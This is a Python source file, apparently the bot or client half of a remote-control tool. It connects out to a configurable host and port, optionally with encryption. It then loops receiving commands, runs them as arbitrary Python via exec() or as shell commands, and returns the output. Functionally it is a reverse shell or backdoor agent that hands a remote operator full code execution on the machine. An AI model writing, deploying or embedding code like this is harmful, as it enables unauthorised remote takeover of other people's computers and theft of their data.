1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
|
import contextlib
import subprocess
import argparse
import os
import io
from typing import Optional
from typing import Tuple
from shared import DEFAULT_HOSTNAME
from shared import DEFAULT_PORT
from shared import DEFAULT_ENCODING
from shared import DEFAULT_LANGUAGE_CODE
from shared import LIBERAL_ENCODING_ERRORS
from shared import Platform
from shared import AsymmetricSocket
from shared import SymmetricSocket
from shared import Socket
class Execute:
ENCODING = DEFAULT_ENCODING
LANGUAGE_CODE = DEFAULT_LANGUAGE_CODE
TIMEOUT = 60
@staticmethod
def code(code: str) -> str:
assert isinstance(code, str), f'Wrong type: {code=}'
buffer = io.StringIO()
with contextlib.redirect_stdout(buffer):
exec(code)
return buffer.getvalue()
@staticmethod
def shell(command: str) -> Tuple[Optional[str], Optional[str]]:
command = command.strip().replace('\n', ' && ')
if Platform.WINDOWS and Execute.LANGUAGE_CODE:
command = f'chcp {Execute.LANGUAGE_CODE} > nul && {command}'
proc = subprocess.Popen(command,
shell=True,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding=Execute.ENCODING,
errors=LIBERAL_ENCODING_ERRORS)
try:
return ''.join(proc.communicate(timeout=Execute.TIMEOUT)).rstrip()
except subprocess.TimeoutExpired as err:
proc.kill(); return f'[BOT] ERROR :: {err}'
class Bot:
def __init__(
self,
*args,
symmetric: Optional[bool]=None,
**kwargs
) -> None:
assert isinstance(symmetric, bool) or symmetric is None, f'Wrong type: {symmetric=}'
if symmetric is None:
self.bot = Socket(*args)
self.bot.set_conn()
self.bot.set_middleware()
elif symmetric:
self.bot = SymmetricSocket(*args, **kwargs)
self.bot.set_conn()
self.bot.set_middleware()
else:
self.bot = AsymmetricSocket(*args, **kwargs)
self.bot.set_conn()
self.bot.set_middleware()
def connect(self) -> None:
while True:
request = self.bot.recv()
try:
command, run = (request.get('request'), request.get('run'))
assert command is not None, f'Missing attribute: {command=}'
assert isinstance(run, bool), f'Wrong type: {run=}'
if run:
response = Execute.code(command)
elif command[:2] == 'cd':
os.chdir(command[2:].lstrip())
response = os.getcwd()
else:
response = Execute.shell(command)
self.bot.send({'response': response})
except Exception as err:
self.bot.send({'response': f'[BOT] ERROR :: {err}'})
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--hostname', default=DEFAULT_HOSTNAME)
parser.add_argument('--port', type=int, default=DEFAULT_PORT)
parser.add_argument('--password')
parser.add_argument('--salt')
parser.add_argument('--pubk_data')
args = parser.parse_args()
if args.password and args.salt:
options = {'symmetric': True, 'password': args.password, 'salt': args.salt}
elif args.pubk_data:
options = {'symmetric': False, 'public_key_data': args.pubk_data}
else:
options = {}
bot = Bot(args.hostname, args.port, **options)
bot.connect()
|